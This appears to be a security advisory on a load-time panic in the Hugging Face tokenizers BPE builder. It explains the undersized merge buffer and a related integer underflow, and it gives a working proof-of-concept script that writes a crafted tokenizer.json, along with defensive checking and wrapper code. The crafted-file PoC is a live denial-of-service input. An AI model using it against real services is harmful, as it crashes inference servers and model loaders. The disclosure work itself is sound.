Summary
Loading an untrusted tokenizer.json panics the BPE model builder and, in Rust and FFI embeddings where the panic is not unwound, aborts the entire process. The builder sizes a scratch buffer to the byte length of the longest vocabulary key, then writes the concatenation of each merge rule into it. A merge whose concatenated token is longer than every vocabulary key indexes past the end of the buffer, which Rust's bounds check turns into a panic. tokenizer.json files ship with Hugging Face models and are routinely downloaded and shared, so loading one is a common, deliberate action.
Details
In tokenizers/src/models/bpe/model.rs, BpeBuilder::build:
let mut buffer: Vec<u8> = vec![0; max_len]; // line 251: max_len = byte length of the LONGEST vocab key
...
buffer[0..a.len()].copy_from_slice(a.as_bytes()); // line 264
let b_len = b.len() - prefix_len;
let merge_len = a.len() + b_len;
buffer[a.len()..merge_len].copy_from_slice(&b.as_bytes()[prefix_len..]); // line 267: panics when merge_len > max_len
buffer is sized to max_len, the byte length of the longest vocab key. For each merge rule (a, b) the code writes the concatenation a + b[prefix_len..], of length merge_len = a.len() + b.len() - prefix_len, into that buffer. When the concatenated merge token is longer than every vocab key, merge_len exceeds max_len, the slice index is out of bounds, and Rust panics. The code already has a graceful error path for out-of-vocabulary merge tokens (Error::MergeTokenOutOfVocabulary, exercised by the test test_bpe_from_file_merge_token_oov), but the buffer write happens before that check, so this case panics instead of returning the intended error.
A secondary defect at the same site: with continuing_subword_prefix set and a merge whose b.len() < prefix_len, the subtraction for b_len underflows (usize), which panics in debug builds and wraps in release builds, corrupting merge_len.
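The length arithmetic above can be modelled outside the crate. The following is a minimal Python sketch, not the library's code: `byte_len` and `find_unsafe_merges` are hypothetical helper names, and the sketch assumes that prefix_len is the byte length of continuing_subword_prefix when it is set and 0 otherwise. It flags every merge rule that would either underflow b_len or produce a merge_len greater than max_len.

```python
from typing import Dict, List, Optional, Tuple


def byte_len(s: str) -> int:
    # Rust's str::len() counts UTF-8 bytes, not characters, so mirror that here.
    return len(s.encode("utf-8"))


def find_unsafe_merges(
    vocab: Dict[str, int],
    merges: List[Tuple[str, str]],
    continuing_subword_prefix: Optional[str] = None,
) -> List[Tuple[str, str, str]]:
    """Return (a, b, reason) for each merge that would trip the buffer write.

    Hypothetical helper: it models the arithmetic described in the advisory,
    it does not call into the tokenizers crate.
    """
    # The scratch buffer is sized to the longest vocab key.
    max_len = max((byte_len(key) for key in vocab), default=0)
    # Assumption: prefix_len is 0 when no continuing_subword_prefix is set.
    prefix_len = byte_len(continuing_subword_prefix) if continuing_subword_prefix else 0

    unsafe = []
    for a, b in merges:
        b_len = byte_len(b) - prefix_len
        if b_len < 0:
            # In Rust this subtraction is on usize and underflows.
            unsafe.append((a, b, "b shorter than prefix (usize underflow)"))
            continue
        merge_len = byte_len(a) + b_len
        if merge_len > max_len:
            unsafe.append((a, b, f"merge_len {merge_len} > max_len {max_len}"))
    return unsafe


# The PoC input: the longest vocab key has length 2, the merged token has length 4.
print(find_unsafe_merges({"aa": 0, "bb": 1}, [("aa", "bb")]))
# prints [('aa', 'bb', 'merge_len 4 > max_len 2')]
```

Adding "aabb" to the vocabulary raises max_len to 4 and the same merge is no longer flagged, which matches the condition described above: the overrun depends only on the merged length exceeding the longest vocab key.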
Sink path: Tokenizer.from_file / from_str deserializes the BPE model (bpe/serialization.rs), calls BpeBuilder::vocab_and_merges, then build, reaching line 267. This is pure load time, no encoding needed. No existing advisory describes the max_len buffer overrun.
PoC
pip install tokenizers
python poc_bpe_panic.py
poc_bpe_panic.py:
import json
import os

from tokenizers import Tokenizer

# vocab's longest key is length 2 ("aa","bb"); merge ["aa","bb"] -> "aabb" (len 4) > max_len (2),
# overrunning the merge buffer at bpe/model.rs:267 during LOAD.
malicious = {
    "version": "1.0", "truncation": None, "padding": None,
    "added_tokens": [], "normalizer": None, "pre_tokenizer": None,
    "post_processor": None, "decoder": None,
    "model": {
        "type": "BPE", "dropout": None, "unk_token": None,
        "continuing_subword_prefix": None, "end_of_word_suffix": None,
        "fuse_unk": False, "byte_fallback": False, "ignore_merges": False,
        "vocab": {"aa": 0, "bb": 1},
        "merges": [["aa", "bb"]],
    },
}
p = os.path.expanduser("~/poc_tokenizer.json")
# Write the crafted file, closing it before the loader reads it.
with open(p, "w") as f:
    json.dump(malicious, f)
Tokenizer.from_file(p)  # panics: range end index 4 out of range for slice of length 2
Observed (tokenizers 0.23.1): thread '<unnamed>' panicked at .../bpe/model.rs:267:23: range end index 4 out of range for slice of length 2, surfacing in the Python binding as pyo3_runtime.PanicException (exit 1), instantly from a tiny input.
Impact
A trivially crafted tokenizer.json causes a denial of service when loaded. In the Python binding the panic surfaces as a catchable exception, but in pure-Rust consumers and FFI embeddings of the tokenizers crate (where panics are not unwound, or panic = "abort" is set, common in release builds) it aborts the entire process. Any service that loads model-supplied tokenizer files (model hubs, inference servers, automated model loaders) is exposed.
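For Python callers, the panic can be converted into an ordinary error. The sketch below is an illustration under stated assumptions, not an official mitigation: `load_guarded` is a hypothetical wrapper, and it identifies the panic by its class name because PyO3's PanicException derives from BaseException (so a plain `except Exception` does not catch it) and is not assumed here to be importable from the tokenizers package. It does nothing for Rust or FFI consumers, where the process aborts.

```python
from typing import Callable, TypeVar

T = TypeVar("T")


def load_guarded(loader: Callable[[str], T], path: str) -> T:
    """Call loader(path) and turn a surfaced Rust panic into ValueError.

    Hypothetical helper. Matching on the class name is an assumption made
    for this sketch; other BaseException subclasses are re-raised untouched.
    """
    try:
        return loader(path)
    except BaseException as exc:
        # PanicException derives from BaseException, so it has to be caught
        # at this level; the name check avoids swallowing KeyboardInterrupt
        # or SystemExit.
        if type(exc).__name__ == "PanicException":
            raise ValueError(f"rejected tokenizer file {path!r}: {exc}") from exc
        raise


# Intended use (requires the tokenizers package, so it is left commented out):
# from tokenizers import Tokenizer
# tok = load_guarded(Tokenizer.from_file, "tokenizer.json")
```

Raising ValueError keeps the failure inside the normal `except Exception` handling that most services already have around model loading, instead of letting a BaseException propagate to the top level.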